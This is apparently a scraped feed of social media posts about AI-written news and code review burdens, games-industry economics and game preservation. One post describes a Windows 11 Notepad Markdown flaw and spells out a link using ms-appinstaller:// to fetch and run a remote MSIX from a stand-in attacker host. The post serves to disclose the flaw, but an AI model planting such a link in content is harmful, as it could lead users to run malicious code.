Whee, @arstechnica.com is the latest long-standing news site to become a shoddy faucet of hallucinated slop.

Bonus: The article (now deleted) was about an OSS maintainer being harassed because they wouldn't accept a slop PR! It's literally slop _about_ slop!
What's going on here? The matplotlib maintainer this story is about correctly notes that all the quotes from his post in the article are made up.

I suspect that G's "readability" mentoring system will be a casualty of AI code adoption. There aren't nearly enough reviewers to keep up with the increased code output lately, nor does a mentoring process provide benefit for bots which don't retain durable learning from CL comments/corrections.
February 13, 2026 at 10:33 PM
Even if the code somewhat works, there's a lot of time spent just calling out basic team code standards.

You're not saving time, you're shifting the effort to the reviewer! And both the number of code review requests I get per week (30+ last wk!) and the time needed/review is going up over time.
February 13, 2026 at 10:33 PM
There are immediate tells when one of my coworkers slopped a CL vs writing it themselves. The style is totally different, weird idioms happen, it uses snippets of baseline iOS APIs (probably cribbed from SO answers) instead of using existing internal libraries.

And it takes a lot longer to review.
February 13, 2026 at 10:33 PM
There's dumb propaganda today about "we haven't written any code by ourselves for months." While a human may not have written it, a human probably had to review it!

Code reviews are time-consuming and hard even for human code, much less weird slop that doesn't follow style guides or best practices.

The game you are about to play is a product of its time. It may depict the PS3, which was commonplace in society. These depictions were wrong then and are wrong today.

Every c-suite's dropping smart money to chase theoretical money while they all pass around promises of massive ROIs on vaporware. Like I said, we ain't makin video games anymore. Job is make shareholder number go up each quarter by any means necessary. We're money being moved around by sociopaths. ๐Ÿ™ƒ
Been thinking about Highguard and the impermanence of games these days (which is to say, moreso that usual)

Serial Experiments Lain is a cautionary, deeply political story about how cool the Sharp X68000 looked, and what would happen if computers kept looking like that.

it's hard not to think about how 5 or 10 years from now, the shooters (and games writ large) we'll be reverently talking about will still be the same ones we talk about now (DOOM 2016, Titanfall 2, etc) because there is no money going around to make new ones of those happen. we are in purgatory.

amazingly it's not related to AI

they added Markdown support to Notepad in W11, and don't adequately sanitize links, so you can write `[dancing bunnies](ms-appinstaller://?source=http://evil.example.com/PwnMe.msix)`, and if the user clicks it, it'll gladly run that remote binary as the current user

it feels also like capital has condensed all possible outcomes of a game project to either "massive critical success that funds new yachts for our investors and SLT" or "abysmal personal failure, owned solely by the devs, that must be punished with decimation"

'modest success' doesn't exist anymore

total insanity man. there's lot of proximal causes, but the main issue is just capital being divorced from the human status of being in charge of the company. as soon as capital isn't in the same building as workers you're fucked fucked fucked.

Anyway, G-Modes Archives and their efforts to re-release Japanese feature phone games of all sorts is quietly one of the coolest things going on in game preservation. Even if you don't read Japanese, many games are perfectly playable. Look some up and throw them a few bucks so they can keep going. ๐Ÿ™
